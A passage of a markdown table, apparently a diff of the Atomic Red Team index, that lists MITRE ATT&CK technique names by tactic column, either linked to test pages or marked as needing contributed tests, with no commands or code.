 | [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [Software Deployment Tools](../../T1072/T1072.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-|  | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) |  | [Video Capture](../../T1125/T1125.md) |  | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
-|  | [Inter-Process Communication](../../T1559/T1559.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Encrypted Channel](../../T1573/T1573.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
-|  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
